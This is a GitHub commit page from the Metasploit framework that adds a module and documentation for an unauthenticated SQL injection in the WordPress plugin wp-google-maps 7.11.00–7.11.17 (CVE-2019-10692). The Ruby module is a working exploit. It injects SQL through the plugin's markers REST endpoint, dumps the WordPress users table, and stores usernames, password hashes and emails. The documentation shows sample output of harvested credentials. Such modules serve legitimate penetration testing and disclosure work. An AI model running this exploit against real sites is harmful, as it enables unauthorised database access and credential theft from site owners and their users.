-
Notifications
You must be signed in to change notification settings - Fork 13.8k
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
Land #11698, Add wp-google-maps unauth SQLi
- Loading branch information
1 parent
e023e34
commit c0a5e36
Showing
2 changed files
with
129 additions
and
0 deletions.
There are no files selected for viewing
33 changes: 33 additions & 0 deletions
33
documentation/modules/auxiliary/admin/http/wp_google_maps_sqli.md
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,33 @@ | ||
## Vulnerable Application | ||
|
||
This module works against the Wordpress plugin `wp-google-maps` between 7.11.00 and 7.11.17 (included). | ||
|
||
[The vulnerable version is available on WordPress' plugin directory](https://downloads.wordpress.org/plugin/wp-google-maps.7.11.17.zip). | ||
|
||
## Verification Steps | ||
|
||
1. `msfconsole` | ||
2. `use auxiliary/admin/http/wp_google_maps_sqli` | ||
3. `set RHOSTS <rhost>` | ||
4. Set `DB_PREFIX` if necessary | ||
5. `run` | ||
|
||
## Options | ||
|
||
### `DB_PREFIX` | ||
|
||
Change the table prefix. By default, this option is set to `wp_`. | ||
|
||
## Scenarios | ||
|
||
### wp-google-maps 7.11.17 on WordPress 4.9.5 | ||
|
||
``` | ||
msf5 auxiliary(admin/http/wp_google_maps_sqli) > exploit | ||
[*] Running module against 172.22.222.144 | ||
[*] 172.22.222.144:80 - Trying to retrieve the wp_users table... | ||
[+] Credentials saved in: /home/msfdev/.msf4/loot/20190415065921_default_172.22.222.144_wp_google_maps.j_022930.bin | ||
[+] 172.22.222.144:80 - Found msfdev <hash> <email> | ||
[*] Auxiliary module execution completed | ||
``` |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,96 @@ | ||
## | ||
# This module requires Metasploit: https://metasploit.com/download | ||
# Current source: https://github.com/rapid7/metasploit-framework | ||
## | ||
|
||
class MetasploitModule < Msf::Auxiliary | ||
include Msf::Exploit::Remote::HTTP::Wordpress | ||
|
||
def initialize(info = {}) | ||
super( | ||
'Name' => 'WordPress Google Maps Plugin SQL Injection', | ||
'Description' => %q{ | ||
This module exploits a SQL injection vulnerability in a REST endpoint | ||
registered by the WordPress plugin wp-google-maps between 7.11.00 and | ||
7.11.17 (included). | ||
As the table prefix can be changed by administrators, set DB_PREFIX | ||
accordingly. | ||
}, | ||
'Author' => | ||
[ | ||
'Thomas Chauchefoin (Synacktiv)', # Vulnerability discovery, Metasploit module | ||
], | ||
'License' => MSF_LICENSE, | ||
'References' => | ||
[ | ||
['CVE', '2019-10692'], | ||
['WPVDB', '9249'] | ||
], | ||
'DisclosureDate' => '2019-04-02' | ||
) | ||
|
||
register_options( | ||
[ | ||
OptString.new('DB_PREFIX', [true, 'WordPress table prefix', 'wp_']) | ||
]) | ||
end | ||
|
||
def send_sql_request(sql_query) | ||
res = send_request_cgi( | ||
'method' => 'GET', | ||
'uri' => normalize_uri(target_uri.path), | ||
'vars_get' => { | ||
'rest_route' => '/wpgmza/v1/markers', | ||
'filter' => '{}', | ||
'fields' => "#{sql_query}-- -", | ||
} | ||
) | ||
|
||
return nil if res.nil? || res.code != 200 || res.body.nil? | ||
res.body | ||
end | ||
|
||
def check | ||
mynum = "#{Rex::Text.rand_text_numeric(8..20)}" | ||
body = send_sql_request(mynum) | ||
return Exploit::CheckCode::Unknown if body.nil? | ||
return Exploit::CheckCode::Vulnerable if body.include?(mynum) | ||
|
||
Exploit::CheckCode::Unknown | ||
end | ||
|
||
def run | ||
print_status("#{peer} - Trying to retrieve the #{datastore['DB_PREFIX']}users table...") | ||
|
||
body = send_sql_request("* from #{datastore['DB_PREFIX']}users") | ||
fail_with(Failure::UnexpectedReply, 'No response or unexpected status code in response') if body.nil? | ||
|
||
begin | ||
body = JSON.parse(body) | ||
rescue JSON::ParserError | ||
fail_with(Failure::NotFound, 'Returned data is not in JSON format') | ||
end | ||
|
||
if body.empty? | ||
print_error("#{peer} - Failed to retrieve the table #{datastore['DB_PREFIX']}users") | ||
else | ||
loot = store_loot("wp_google_maps.json","application/json", rhost, body.to_s) | ||
print_good("Credentials saved in: #{loot}") | ||
end | ||
|
||
body.each do |user| | ||
print_good("#{peer} - Found #{user['user_login']} #{user['user_pass']} #{user['user_email']}") | ||
connection_details = { | ||
module_fullname: self.fullname, | ||
username: user['user_login'], | ||
private_data: user['user_pass'], | ||
private_type: :nonreplayable_hash, | ||
workspace_id: myworkspace_id, | ||
status: Metasploit::Model::Login::Status::UNTRIED, | ||
proof: user['user_email'] | ||
}.merge(service_details) | ||
create_credential(connection_details) | ||
end | ||
end | ||
end |